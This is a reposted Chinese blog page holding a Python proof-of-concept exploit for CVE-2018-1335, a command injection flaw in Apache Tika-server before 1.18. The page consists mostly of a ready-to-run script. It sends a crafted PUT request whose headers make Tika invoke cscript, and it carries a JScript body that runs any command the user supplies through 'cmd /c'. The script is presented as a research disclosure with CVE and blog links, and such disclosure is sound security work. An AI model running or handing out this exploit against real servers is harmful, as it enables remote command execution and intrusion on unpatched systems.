[EXP]Apache Tika-server < 1.18 - Command Injection

本文介绍了一个在Apache Tika-server中发现的远程命令执行漏洞(CVE-2018-1335),该漏洞影响版本低于1.18的Tika-server。文章提供了漏洞利用的Python脚本示例,展示了如何通过构造恶意HTTP请求来执行任意命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

######################################################################################################
#Description: This is a PoC for remote command execution in Apache Tika-server.                      #
#Versions Affected: Tika-server versions < 1.18                                                      #   
#Researcher: David Yesland Twitter: @Daveysec                                                        #
#Blog Link: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ #                                                                   # 
#NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1335                                       #
######################################################################################################

import sys
import requests

if len(sys.argv) < 4:
    print "Usage: python CVE-2018-1335.py <host> <port> <command>"
    print "Example: python CVE-2018-1335.py localhost 9998 calc.exe"
else:
    host = sys.argv[1]
    port = sys.argv[2]
    cmd = sys.argv[3]

    url = host+":"+str(port)+"/meta"

    headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", 
        "X-Tika-OCRLanguage": "//E:Jscript", 
        "Expect": "100-continue", 
        "Content-type": "image/jp2", 
        "Connection": "close"}

    jscript='''var oShell = WScript.CreateObject("WScript.Shell");
    var oExec = oShell.Exec('cmd /c {}');
    '''.format(cmd)

    try:
        requests.put("https://"+url, headers=headers, data=jscript, verify=False)
    
    except:
        try:
            requests.put("http://"+url, headers=headers, data=jscript)
        except:
            print "Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>"
            

 

转载于:https://www.cnblogs.com/k8gege/p/10533413.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值